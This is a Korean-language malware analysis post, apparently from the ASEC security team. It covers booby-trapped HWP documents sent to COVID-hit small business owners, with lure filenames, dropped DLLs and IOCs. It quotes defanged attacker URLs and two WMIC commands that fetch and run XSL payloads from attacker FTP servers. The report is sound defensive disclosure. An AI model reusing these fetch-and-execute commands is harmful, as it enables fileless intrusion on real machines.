ASEC 분석팀은 현재 코로나19로 어려움을 겪고있는 소상공인을 대상으로 악성 한글 문서를 유포하는 정황을 포착하였다. 공격자는 한글 문서에 악성 PostScript를 삽입하거나 악성 OLE 개체를 삽입하였으며, 다음과 같은 파일명을 통해 악성 문서를 유포한 것으로 확인 되었다.
- 코로나바이러스감염증-19 피해 소상공인 경영안정자금 공고.hwp
- 2020년 중소벤처기업부 소관 소상공인 정책자금 융자계획 변경 공고.hwp
- 발주서(산단)_컴퓨터 2대.hwp
- 최근거래내역.hwp
실제 공격에 사용된 한글 문서 파일은 수집되지 않았지만, 위에서 언급한 파일명 중 “코로나바이러스감염증-19 피해 소상공인 경영안정자금 공고.hwp”의 경우 중소벤처기업부 공식 사이트에서 [그림 1]과 같은 동일한 파일명의 한글 문서 파일을 확인할 수 있다. 공격자는 해당 한글 문서 파일과 같이 정상 문서에 악성 PostScript 및 OLE 개체를 삽입하여 소상공인 대상으로 악성 문서를 유포하였을 것으로 추정된다.
해당 한글 문서 열람 시 기존에 알려진 방식대로 PostScript 문법을 사용하여 악성 DLL 파일을 다운로드 하거나, 악성 OLE 개체(스크립트)를 통해 악성 DLL을 드롭 및 실행한다.
- wscapi.dll (컴파일 시간 : Dec 03 2020 10:43:54 GMT+09)
- mss.dat (컴파일 시간 : Dec 03 2020 10:41:56 GMT+09)
아래의 그림은 위에서 확인된 2가지 악성파일(wscapi.dll, mss.dat)을 생성한 것으로 확인된 한글문서 파일에 대한 정보를 나타낸다.
악성 DLL 다운로드를 위해 PostScript가 접속하는 주소
- hxxp://g.smtper.cz/log/d/s.png
- hxxp://otp.greenulz.com/assets/logo.png
최종적으로 PostScript에 의해 다운로드된 DLL과 OLE 개체를 통해 드롭된 DLL은 모두 WMIC 명령을 통해 ftp 서버로부터 추가 페이로드를 실행하는 행위를 수행한다.
- wmic os get /format:”ftp[:]//d:d@blog.greenulz.com/design/usoprive”
- wmic os get /format:”ftp[:]//u:u@green.smtper.cz/gate/usoprive”
이러한 방식은 MITRE ATT&CK Windows Matrix에서 Defense Evasion 기법 중 하나로 소개되어 있다. 해당 방식을 사용하면 파일리스 형태로 메모리 상에서 XSL(Extensible Stylesheet Language) 스크립트가 실행된다. 분석 당시 [그림 2]와 같은 스크립트가 공격자 FTP 서버로부터 다운로드되었다.
확인된 스크립트는 사용자 PC에 작업 스케줄러 등록 및 추가 페이로드를 다운로드 및 실행하는 기능을 수행한다.
코로나 19로 타격을 입은 소상공인들을 위한 3차 재난지원금의 논의가 되고있는 가운데, 이를 악용하는 악성 한글 문서 유포 사례가 확인되었다. 사용자는 메일의 첨부파일 열람 시 출처가 불분명할 경우 첨부파일 실행을 지양해야한다.
다음은 한글 문서 파일에 의해 드롭된 DLL 파일 내부 정보이다.
[PDB 정보]
- J:\2020_work\PEHyper\mpr\Release\mpr.pdb
- J:\2020_work\PEHyper\wscapi\Release\wscapi.pdb
[파일진단]
- Trojan/Win32.Hwdoor.C4262398 (2020.12.15.08)
- Trojan/Win32.Hwdoor.C4262399 (2020.12.15.08)
[행위진단]
- Malware/MDP.Behavior.M3480
[IOC]
- ca567e78ef5141676dadf7938e0506d6 (악성 OLE 개체 드롭 DLL)
- 1d4654e47e61992054ead321f01f500a (PostScript 드롭 DLL)
- hxxps://cafe.greenulz.com/design/logo.php?time=400
Categories:악성코드 정보